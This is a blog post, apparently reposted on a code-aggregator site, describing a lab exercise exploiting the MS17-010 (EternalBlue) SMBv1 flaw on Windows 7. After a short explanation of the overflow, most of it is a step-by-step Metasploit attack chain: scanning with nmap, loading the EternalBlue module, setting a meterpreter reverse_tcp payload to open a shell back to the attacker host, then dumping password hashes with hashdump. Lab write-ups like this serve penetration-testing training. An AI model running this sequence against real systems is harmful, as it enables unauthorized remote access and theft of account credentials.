MS17-010 remote overflow (CVE-2017-0143)

Others 2020-09-14 14:43:34 views: null

Vulnerability introduction

The MS17-010 vulnerability appears in the kernel mode function srv!SrvOs2FeaListToNt in Windows SMB v1 when processing FEA (File Extended Attributes) conversion, and there is a buffer overflow in the Large Non-Paged Kernel Pool.
The function srv!SrvOs2FeaListToNt will be called before converting the FEA list into NTFEA (Windows NT FEA) list. srv!SrvOs2FeaListSizeToNt to calculate the size of the converted FEA lsit, the size of the calculation is wrong, resulting in buffer overflow.

lab environment

Here I use the shooting range of Anjie.com

time 192.168.0.3
Windows7 192.168.0.2

Exploit

Open nmap to scan the target machine

nmap  -sV -Pn 192.168.0.2

The target machine has opened ports such as 135, 139, 445, and the system is win7.
Then we open msf

msfconsole

Open the metasploite command line client and use the search command to find the related modules of ms17-010 vulnerabilities

search ms17-010

Since this is the target location, we can use it directly

use exploit/windows/smb/ms17_010_eternalblue

View the configuration information and set the attributes marked as yes

show options

Set the IP address of the target machine

set RHOSTS 192.168.0.2

After that, select the payload payload, which is shellcode, here we choose to connect back to the payload of the console shell

set payload  windows/x64/meterpreter/reverse_tcp

Similarly, the load also needs to be configured, show options view configuration information The
configuration is missing the local host LHOST, set it

set LHOST 192.168.0.3

After completing the configuration, run the exploit or run to start executing the exploit module

run

Successfully get the Session session from the target host

We have successfully obtained the Session session. This time we will continue to introduce other functions of the penetration module after meterpreter.
Run sysinfo to view relevant information of the target machine.

sysinfo

Executing the help command can help us understand what functions meterpreter has

help

Next, we obtain the hash value of the target machine and
execute hashdump

hashdump

to sum up

Another simple and fulfilling day!

Guess you like

Origin blog.csdn.net/p_utao/article/details/108394587
Recommended
Ranking
2019 JD pen questions - Choir
Grafana installation & basic configuration
How to solve the high gas fee of Filecoin? The official attitude is bright!
Informatization development 59
Date,DateFormat,Calendar,
Introduction to MySQL - Understanding MySQL
win10 conexão de área de trabalho remota ubuntu20 (RDP)
52. Customize generics on methods
Detailed explanation of CAP, ACID, BASE theory and NWR practice strategy
UnknownHostException:XXX:Name or service not know
Daily
More
2024-08-01(0)
2024-07-31(0)
2024-07-30(0)
2024-07-29(0)
2024-07-28(0)
2024-07-27(0)
2024-07-26(0)
2024-07-25(0)
2024-07-24(0)
2024-07-23(0)

Code World

© 2018 codetd.com